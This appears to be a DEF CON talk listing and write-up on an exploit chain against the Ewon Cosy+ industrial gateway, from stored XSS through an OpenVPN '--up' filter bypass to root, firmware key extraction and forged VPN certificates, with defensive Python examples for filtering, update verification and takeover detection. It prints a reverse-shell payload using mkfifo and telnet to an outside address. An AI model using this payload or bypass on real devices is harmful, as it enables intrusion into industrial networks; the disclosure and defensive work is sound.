Unlocking the Gates: Hacking a Secure Industrial Remote Access Solution

DEFCONConference · 1,343 views · 18:25 · over 1 year ago

This talk demonstrates a multi-stage exploit chain against the Ewon Cosy+ industrial remote access gateway, starting with a persistent XSS vulnerability in the FTP login process. By leveraging this XSS to gain administrative access, the researcher was able to upload a malicious OpenVPN configuration to achieve remote code execution as root. The research further details how to bypass hardware security features, including the extraction of firmware-specific encryption keys and the generation of valid, signed VPN authentication certificates for unauthorized devices.

Breaking the Ewon Cosy+ Industrial Gateway: From XSS to Root

TLDR: This research details a multi-stage exploit chain against the Ewon Cosy+ industrial gateway, moving from a persistent XSS in the FTP login to full root access. By bypassing hardware-backed security, the researcher successfully extracted firmware-specific encryption keys and generated valid, signed VPN authentication certificates. This work highlights the critical risk of trusting hardware security modules when the surrounding software implementation fails to properly isolate sensitive operations.

Industrial control systems often rely on remote access gateways to bridge the gap between field devices and the outside world. These devices are the literal keys to the kingdom, yet they frequently suffer from the same class of vulnerabilities as standard web applications. The Ewon Cosy+ gateway is a prime example of how a chain of seemingly minor flaws can lead to a complete compromise of critical infrastructure.

The Attack Chain

The research begins with a persistent cross-site scripting (XSS) vulnerability triggered through the FTP login process. The gateway records failed FTP login attempts, username included, and displays that log in its web interface. If an attacker supplies malicious JavaScript as the username of a failed FTP login, the script executes in the browser session of the administrator who later views the log.

This is not just a theoretical concern. Because the device stores administrative credentials in an insecure cookie, the injected script can easily exfiltrate these credentials. Once the attacker has the admin password, they can access the device's configuration settings. The gateway allows users to upload custom OpenVPN configuration files. By modifying the up parameter in a custom configuration, an attacker can execute arbitrary commands with root privileges.

The command injection is straightforward. The gateway's filter looks for the bare up directive, but OpenVPN also accepts the option spelling with two leading dashes, so writing --up instead of up bypasses the filter that is meant to prevent the execution of custom scripts. The following payload demonstrates how to initiate a reverse shell:

--up "/bin/sh -c 'TF=$(mktemp -u);mkfifo $TF;telnet 192.168.33.1 5000 0<$TF | sh >$TF 2>&1'"
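The filter bypass above comes down to a normalisation gap: the check compares the raw first token of each line, while OpenVPN treats "up" and "--up" as the same directive. The following Python is an added example, not code from the talk or from the vendor, showing a model of such a naive filter next to a check that normalises each line the way OpenVPN reads it before comparing against a denylist of script-running directives. The sample configuration and the denylist are constructed for the example; an allowlist of known-safe directives is the stronger design for a real upload handler.

```python
from typing import List, Optional

# OpenVPN directives that make the daemon run an external program or load a
# plugin. Constructed denylist for this example; allowlisting known-safe
# directives is the stronger design for a production upload handler.
SCRIPT_DIRECTIVES = {
    "up", "down", "route-up", "route-pre-down", "ipchange", "tls-verify",
    "auth-user-pass-verify", "client-connect", "client-disconnect",
    "learn-address", "plugin", "script-security",
}


def naive_filter(config_text: str) -> List[str]:
    """Model of a filter that only recognises a bare directive at the start of
    a line. OpenVPN also accepts the option spelling with leading dashes, so a
    line beginning with '--up' is never matched and slips through."""
    hits = []
    for line in config_text.splitlines():
        parts = line.split()
        if parts and parts[0] in SCRIPT_DIRECTIVES:
            hits.append(line.strip())
    return hits


def directive_name(line: str) -> Optional[str]:
    """Return the directive on a config line, normalised the way OpenVPN reads
    it: surrounding whitespace and any leading dashes dropped, lower-cased.
    Returns None for blank lines and comments."""
    stripped = line.strip()
    if not stripped or stripped[0] in "#;":
        return None
    return stripped.split(None, 1)[0].lstrip("-").lower()


def find_script_directives(config_text: str) -> List[str]:
    """Hardened check: normalise every line before comparing."""
    hits = []
    for line in config_text.splitlines():
        if directive_name(line) in SCRIPT_DIRECTIVES:
            hits.append(line.strip())
    return hits


# Constructed upload: a benign-looking client config carrying two script hooks,
# one spelled bare and one with the dashes that defeat the naive filter.
SAMPLE_CONFIG = """\
client
dev tun
remote vpn.example.invalid 1194
script-security 2
--up /tmp/constructed-demo.sh
"""

if __name__ == "__main__":
    print("naive filter caught:", naive_filter(SAMPLE_CONFIG))
    print("normalised check caught:", find_script_directives(SAMPLE_CONFIG))
```

Run against the sample, the naive filter reports only the script-security line, while the normalised check reports both it and the --up line. The same normalisation should be applied before any other validation of user-supplied OpenVPN configuration, since every directive has both spellings.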

Bypassing Hardware Security

Many vendors rely on hardware security modules (HSMs) to protect sensitive data, assuming that if the hardware is secure, the system is secure. This research proves that assumption wrong. The Ewon Cosy+ uses an NXP i.MX6 processor and an HSM to handle cryptographic operations. However, the software implementation fails to properly isolate these operations.

The researcher discovered that firmware update files are encrypted, but the device must decrypt them to install them. By gaining root access, the researcher was able to reverse-engineer the update process. They found that the device reads a key type, an encrypted AES key, and an initialization vector (IV) from the update file. The encrypted key is passed to the HSM, which returns the plaintext key. With this key, the researcher could decrypt the firmware and extract the parser script, which in turn decrypts the various firmware partitions.

This process reveals a fundamental flaw: the device treats the HSM as a black box for decryption without verifying the integrity of the request. If an attacker can control the software that talks to the HSM, they can force it to decrypt whatever they want.
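The flaw described above is a decryption oracle: the code reads the key type, wrapped key and IV from the update file and asks the HSM to unwrap whatever it finds there, so root on the device is enough to unwrap any update. The Python below is an added example, not the vendor's update code, contrasting that flow with one that authenticates the update envelope before the HSM is involved. The update layout, the secrets and the payload are constructed for the demo, and the key wrapping is a toy XOR pad standing in for the real AES operation; HMAC-SHA256 with a vendor key stands in for the asymmetric signature a real design would verify.

```python
import hashlib
import hmac
from typing import Optional

# Constructed secrets for the demo. In a real device the key-encryption key
# never leaves the HSM and the vendor verification key is a public key.
HSM_KEK = bytes.fromhex("0f" * 32)
VENDOR_VERIFY_KEY = bytes.fromhex("a5" * 32)


def _keystream(iv: bytes) -> bytes:
    # Toy key-wrapping stand-in: a 16-byte pad derived from the KEK and IV.
    return hashlib.sha256(HSM_KEK + iv).digest()[:16]


def hsm_unwrap_raw(wrapped_key: bytes, iv: bytes) -> bytes:
    """What the HSM primitive does: unwrap whatever it is handed."""
    return bytes(a ^ b for a, b in zip(wrapped_key, _keystream(iv)))


def hsm_wrap(plain_key: bytes, iv: bytes) -> bytes:
    # The XOR pad is symmetric; only used here to build demo updates.
    return hsm_unwrap_raw(plain_key, iv)


def parse_header(update: bytes):
    """Assumed update layout for this example:
    key_type(1) | wrapped_key(16) | iv(16) | tag(32) | payload."""
    key_type = update[0]
    wrapped, iv, tag = update[1:17], update[17:33], update[33:65]
    return key_type, wrapped, iv, tag, update[65:]


def naive_unwrap(update: bytes) -> bytes:
    """Vulnerable flow: read the fields and hand the wrapped key straight to
    the HSM. Any update an attacker assembles is unwrapped without question."""
    _, wrapped, iv, _, _ = parse_header(update)
    return hsm_unwrap_raw(wrapped, iv)


def bound_unwrap(update: bytes) -> Optional[bytes]:
    """Hardened flow: authenticate header and payload with the vendor key
    before the HSM is asked for anything. Returns None when the tag fails."""
    key_type, wrapped, iv, tag, payload = parse_header(update)
    body = bytes([key_type]) + wrapped + iv + payload
    expected = hmac.new(VENDOR_VERIFY_KEY, body, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        return None
    return hsm_unwrap_raw(wrapped, iv)


def build_update(key_type: int, plain_key: bytes, iv: bytes,
                 payload: bytes, sign: bool) -> bytes:
    """Assemble an update; sign=False models a party without the vendor key."""
    wrapped = hsm_wrap(plain_key, iv)
    body = bytes([key_type]) + wrapped + iv + payload
    tag = hmac.new(VENDOR_VERIFY_KEY, body, hashlib.sha256).digest() if sign else bytes(32)
    return bytes([key_type]) + wrapped + iv + tag + payload


# Constructed sample material.
DEMO_KEY = bytes.fromhex("11" * 16)
DEMO_IV = bytes(range(16))
DEMO_PAYLOAD = b"constructed firmware image"


def demo() -> dict:
    legit = build_update(1, DEMO_KEY, DEMO_IV, DEMO_PAYLOAD, sign=True)
    forged = build_update(1, DEMO_KEY, DEMO_IV, DEMO_PAYLOAD, sign=False)
    tampered = legit[:-1] + bytes([legit[-1] ^ 0xFF])
    return {
        "naive_unwraps_forged": naive_unwrap(forged) == DEMO_KEY,
        "bound_accepts_legit": bound_unwrap(legit) == DEMO_KEY,
        "bound_rejects_forged": bound_unwrap(forged) is None,
        "bound_rejects_tampered": bound_unwrap(tampered) is None,
    }


if __name__ == "__main__":
    print(demo())
```

The point of the hardened flow is ordering: the integrity check covers the key type, the wrapped key, the IV and the payload together, and it runs before the HSM call, so a modified or unsigned envelope never reaches the unwrap primitive. Whether the check itself is done by the HSM or by host software matters too; binding it to the HSM removes the host as a place for an attacker with root to skip it.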

VPN Hijacking and Certificate Forgery

The most dangerous part of this research is the ability to forge valid VPN authentication certificates. The gateway generates a certificate signing request (CSR) during account assignment and sends it to the vendor's backend. The backend signs the request and returns a certificate containing the device's serial number. This serial number is then used by the VPN server to assign the device to a specific account.

By obtaining a valid serial number for a device located at the vendor's lab, the researcher was able to generate a CSR for that serial number. Because the backend does not verify that the requester actually owns the serial number, it signed the request. The researcher then used this forged certificate to initiate a VPN session, effectively hijacking the connection of the original device.

This technique is devastating. It allows an attacker to disconnect legitimate users and intercept their traffic. Since the VPN tunnel lacks network restrictions, the attacker can access all services on the connected client's network. This is a clear case of broken access control and identification and authentication failures.

Real-World Impact

For a pentester, this research is a masterclass in chaining vulnerabilities. You are unlikely to find a single "magic" exploit that grants root access. Instead, you must look for the small, often overlooked bugs—like an XSS in a log file or a filter that can be bypassed with a simple command-line trick.

The impact of this attack is not limited to a single device. Because the vendor's infrastructure is centralized, a single forged certificate can be used to target any device on the network. The CVE entries associated with this research, including CVE-2024-33892, CVE-2024-33896, CVE-2024-33895, CVE-2024-33894, and CVE-2024-33897, demonstrate the breadth of the issue.

Defenders must prioritize patching these devices and, more importantly, implementing strict network segmentation. A remote access gateway should never have unrestricted access to the internal network. If you are managing these devices, ensure that the firmware is up to date and that you are monitoring for unusual VPN activity.
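The VPN hijack described in the certificate forgery section has a visible signature on the server side: a second connect for a device serial that already has a live session, arriving from a different source address, followed by the original session dropping. The Python below is an added example of the monitoring recommended above, not a tool from the talk or the vendor; the log line format and the addresses are constructed for the demo, so a real deployment would adapt the regular expression to its own VPN server log.

```python
import re
from datetime import datetime
from typing import Dict, List, Optional

# Constructed VPN server log lines, not from any real product. Each connect
# carries the device serial taken from the client certificate.
SAMPLE_LOG = """\
2024-08-10T10:00:00Z serial=CONSTRUCTED-0001 event=connect src=203.0.113.10
2024-08-10T10:00:05Z serial=CONSTRUCTED-0002 event=connect src=203.0.113.11
2024-08-10T10:20:00Z serial=CONSTRUCTED-0001 event=connect src=198.51.100.7
2024-08-10T10:20:01Z serial=CONSTRUCTED-0001 event=disconnect src=203.0.113.10
2024-08-10T11:00:00Z serial=CONSTRUCTED-0002 event=disconnect src=203.0.113.11
2024-08-10T11:05:00Z serial=CONSTRUCTED-0002 event=connect src=203.0.113.11
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) serial=(?P<serial>\S+) event=(?P<event>\w+) src=(?P<src>\S+)"
)


def parse_line(line: str) -> Optional[dict]:
    """Parse one log line into a dict, or None if it does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%Y-%m-%dT%H:%M:%SZ")
    return rec


def find_session_takeovers(log_text: str) -> List[dict]:
    """Flag a connect for a serial that already has a live session from a
    different source address. A normal reconnect from the same address after
    a disconnect does not alert; a displacement by another client does."""
    active: Dict[str, str] = {}  # serial -> source address of live session
    alerts: List[dict] = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        serial, src = rec["serial"], rec["src"]
        if rec["event"] == "connect":
            prev = active.get(serial)
            if prev is not None and prev != src:
                alerts.append({
                    "serial": serial,
                    "old_src": prev,
                    "new_src": src,
                    "at": rec["ts"].isoformat(),
                })
            active[serial] = src
        elif rec["event"] == "disconnect":
            # Only clear the session if the disconnect is for the live source;
            # the displaced client's late disconnect must not clear the new one.
            if active.get(serial) == src:
                del active[serial]
    return alerts


if __name__ == "__main__":
    for alert in find_session_takeovers(SAMPLE_LOG):
        print("possible session takeover:", alert)
```

On the sample, only CONSTRUCTED-0001 alerts: its session from 203.0.113.10 is displaced by a connect from 198.51.100.7 before the original disconnects. CONSTRUCTED-0002 disconnects and reconnects from the same address, which is ordinary behaviour. A serial being served from two addresses at once is exactly what certificate forgery against the serial-based account mapping produces, and it is a far cheaper signal to alert on than anything inside the tunnel.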

The next time you are auditing an IoT device, don't just look for open ports. Look at how the device handles its own security. Does it trust the hardware blindly? Does it allow users to upload arbitrary configurations? These are the questions that lead to the most impactful findings. Keep digging, and don't assume that a "secure" label means the device is actually secure.

Talk Type: research presentation
Difficulty: advanced
Category: iot security
Has Demo · Has Code · Tool Released


DEF CON 32 · 260 talks · 2024